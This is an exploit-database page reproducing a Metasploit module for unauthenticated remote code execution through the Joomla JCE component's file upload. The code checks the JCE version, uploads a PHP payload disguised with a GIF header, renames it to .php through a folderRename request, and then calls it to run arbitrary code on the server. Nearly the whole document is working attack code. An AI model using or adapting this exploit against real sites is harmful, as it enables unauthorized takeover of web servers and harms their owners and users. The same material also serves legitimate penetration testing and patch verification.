Joomla Component JCE File Upload Remote Code Execution



EKU-ID: 3109 CVE: OSVDB-ID:
Author: temp66 Published: 2013-03-27 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::FileDropper

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Joomla Component JCE File Upload Remote Code Execution',
			'Description'    => %q{
					This module exploits a vulnerability  in the JCE component for Joomla!, which
			could allow an unauthenticated remote attacker to upload arbitrary files, caused by the
			fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP
			request, a remote attacker could exploit this vulnerability to upload a malicious PHP
			script, which could allow the attacker to execute arbitrary PHP code on the vulnerable
			system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla
			1.5.26.
			},
			'Author'         =>
				[
					'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC
					'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module
				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					['BID', '49338'],
					['EDB', '17734']
				],
			'Payload'        =>
				{
					'Space'       => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
					'DisableNops' => true,
					'BadChars'    => "#",
					'Keys'        => ['php']
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'Privileged'     => false,
			'DisclosureDate' => 'Aug 2 2012',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('TARGETURI', [true, "Joomla directory path", "/"])
				], self.class)
	end


	def get_version
		# check imgmanager version
		@uri_base 		= normalize_uri(target_uri.path.to_s, 'index.php')
		@vars_get_base 	=  	{
			'option'=> 'com_jce',
			'task'  => 'plugin',
			'plugin'=> 'imgmanager',
			'file'  => 'imgmanager'
		}
		print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
		res = send_request_cgi({
			'uri' 	  => @uri_base,
			'vars_get' => @vars_get_base,
			'method'  => 'GET',
			'version' => '1.1'
		})

		version = nil
		if (res and res.code == 200)
			res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
			version = $1.nil? ? nil : $1
		end

		return version
	end

	def check
		version = ( get_version || '').to_s

		if (version.match(%r{1\.5\.7\.1[0-4]?}))
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end


	def upload_gif
		# add GIF header
		cmd_php = "GIF89aG\n<?php #{payload.encoded}  ?>"

		# Generate some random strings
		@payload_name  	= rand_text_alpha_lower(6)
		boundary   		= '-' * 27 + rand_text_numeric(11)

		parms 			= {'method'=> 'form'}
		parms.merge!(@vars_get_base)

		# POST data
		post_data = Rex::MIME::Message.new
		post_data.bound = boundary
		post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
		post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
		post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
		post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"")
		post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"")
		post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")

		data = post_data.to_s

		res = send_request_cgi({
			'uri'	  	=> @uri_base,
			'vars_get' 	=> parms,
			'method'  	=> 'POST',
			'version' 	=> '1.1',
			'data'    	=> data,
			'ctype'  	=> "multipart/form-data; boundary=#{post_data.bound}"
		})

		if (res and res.code = 200 )
			return :access_denied if (res.body =~ /RESTRICTED/i)
			print_good("Successfully uploaded #{@payload_name}.gif")
		else
			print_error("Error uploading #{@payload_name}.gif")
			return :abort
		end

		return :success

	end

	def renamed?
		# Rename the file from .gif to .php

		data =	"json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}"

		print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php")

		res = send_request_cgi(
			{
				'uri'       => @uri_base,
				'vars_get'	=> @vars_get_base,
				'method'    => 'POST',
				'version'   => '1.1',
				'data' 	    => data,
				'ctype'     => 'application/x-www-form-urlencoded; charset=utf-8',
				'headers'   =>
				{
					'X-Request' => 'JSON'
				}
			})
		if (res and res.code == 200 )
			print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php")
			return true
		else
			print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php")
			return false
		end
	end

	def call_payload
		payload = "#{@payload_name}.php"
		print_status("Calling payload: #{payload}")
		uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)
		res = send_request_cgi({
			'uri'	=> uri,
			'method'    => 'GET',
			'version'   => '1.1'
		})
	end



	def exploit

		return if not check == Exploit::CheckCode::Vulnerable
		if upload_gif == :success
			if renamed?
				register_files_for_cleanup("#{@payload_name}.php")
				call_payload
			end
		end

	end

end